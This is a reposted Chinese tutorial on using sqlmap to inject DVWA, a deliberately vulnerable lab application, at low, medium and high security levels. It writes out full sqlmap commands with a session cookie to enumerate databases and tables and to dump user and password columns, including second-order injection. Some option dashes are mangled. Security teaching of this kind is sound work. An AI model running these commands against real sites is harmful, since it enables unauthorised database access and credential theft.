Sqlmap自动化注入的示例分析

Sqlmap自动化注入的示例分析

使用sqlmap对dvwa进行自动化注入
设置dvwa级别为low

  1. 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。

  2. 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我们直接放到salmap测试一下,使用-u命令 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#”

  4. 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录

6.使用burp suite代理抓包,获取登录的cookie,添加–dbs 爆数据 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” — cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” –dbs

可以看到爆出来的数据库是mysql

7. 我们用-D xxx指定查看的数据库,用–tables查看该数据库的所有表:-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa –tables

查看跑出来的结果:

8.我们用-D xxx -T ttt指定查看的表,用–columns查看表的列

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users –columns

9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users -C password,user –dump

  • 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 –dbs(后续的参数自己添加即可)

  • 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法

  • 提交数据的网址

  • 返回的网址

将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 –dbs

爆表名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” – -batch –level 2 -D dvwa –tables

爆列名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/”

— batch –level 2 -D dvwa -T user –columns

爆字段数据

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 -D dvwa -T users -C user,password –dump

  • 一些概念问题:

  • 二阶注入:二阶sql注入–second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址

  • –batch:自动默认配置,不用手动按yes or no

  • level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)

以上就是Sqlmap自动化注入的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

文章标题:Sqlmap自动化注入的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/26232

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年9月16日 下午10:42
下一篇 2022年9月16日 下午10:43

相关推荐

  • cad字体都是问号如何解决

    解决方法 1、比如我们打开图纸时,系统提示找不到字体gbcbig.shx; 2、然后我们复制这个字体去浏览器里搜索下载。 3、接着我们点击桌面上的CAD图标,点击属性,打开快捷方式,找到底部的打开文件所在位置。 4、然后我们找到字体文件夹,就是Fonts文件夹。 5、接着我们就把刚刚从网站上下载下来…

    2022年9月6日
    6300
  • git如何删除某个分支

    git删除某个分支的方法:1、利用“git branch –delete dev”命令删除本地分支;2、利用“git push origin –delete branch”命令删除远程分支;3、利用“git branch –delete –remote…

    2022年6月29日
    10.1K00
  • php可不可以循环字符串

    php可以循环字符串。在PHP里,字符串可以当作数组来使用,字符串中的字符可以通过一个以0为开始的,用类似数组结构中的方括号包含对应数字的方式来查找和修改;因此也可以像循环数组那样循环字符串),循环字符串的语法“for($i=0;$i<strlen($str);$i++){//循环体语句}”。…

    2022年9月26日
    6500
  • win10系统怎么设置以管理员权限运行软件

    在我们使用win10系统的过程中,经常会遇到一些软件的权限问题,这时我们就需要以管理员身份才可以正常运行操作软件,但是有的用户发现我们的win10系统中没有以管理员权限运行软件的选项怎么办呢?   具体方法如下:   1、在桌面右击此电脑也就是我的电脑,选择“管理”;   2、展开至计算机管理 → …

    2022年9月8日
    27500
  • 如何分析APK安全及自动化审计

    一、 闲聊 说到移动安全,可能大家比较陌生,因为这方面的研究是在最近几年才逐渐火起来的。那么什么是移动安全呢?首先,我们知道,移动安全无非就是ios平台和安卓平台上的一些安全性的问题,包括平台系统系统本身的一些问题和应用层面上的问题。当然在客户端和服务端在进行交互的时候还需要涉及一些通信协议,主要是…

    2022年9月10日
    26600
  • mysql游标的作用是什么

    本篇文章“mysql游标的作用是什么”主要为您从以下几个方面讲解:实例、游标嵌套、游标的用法、动态SQL,希望对您有所启发。

    2022年6月29日
    22400
  • 如何浅谈APP存在的安全问题

    1 背景分析 互联网时代到来时,人们曾经感慨,一切都在被数字化。而今天,一切都在移动化。在大街小巷民众低头忙着划动屏幕成为一景。据国外权威机构统计,中国智能手机已经占到手机总销量的96%,古老的功能手机,基本上退出了历史舞台。据美国市场研究公司eMarketer最近的一个报告称,权威市调机构Gart…

    2022年9月18日
    15600
  • WordPress插件WooCommerce任意文件删除漏洞怎么解决

    技术细节 WordPress的权限处理机制主要是通过给不同角色提供不同的功能来实现的,当商铺管理员角色被定义之后,它便会给这个角色分配edit_users功能,这样他们就可以直接管理商铺的客户账号了。整个权限分配过程发生在插件插件饿的安装过程当中。woocommerce/includes/class…

    2022年8月30日
    15800
  • java是值传递吗

    java是值传递;值传递是指在调用方法时将实际参数拷贝一份传递到方法中,这样在方法中如果对参数进行修改,将不会影响到实际参数;当传的是基本类型时,传的是值的拷贝,对拷贝变量的修改不影响原变量;当传的是引用类型时,传的是引用地址的拷贝,但是拷贝的地址和真实地址指向的都是同一个真实数据,因此可以修改原变…

    2022年9月8日
    3600
  • windows todesk无法登录怎么解决

    解决方法: 一、账号错误 1、我们可以使用手机验证码、微信扫码或app扫码三种登录方式。 2、如果我们一种方法无法登录,可以尝试切换不同的登录方式来解决。 二、本地网络 1、如果所有方法都无法登录,那么可能是本地网络连接故障。 2、建议大家查看一下自己的网络是否能够使用,比较方便的就是看看能不能进入…

    2022年9月21日
    49400
联系我们
站长微信
站长微信
分享本页
返回顶部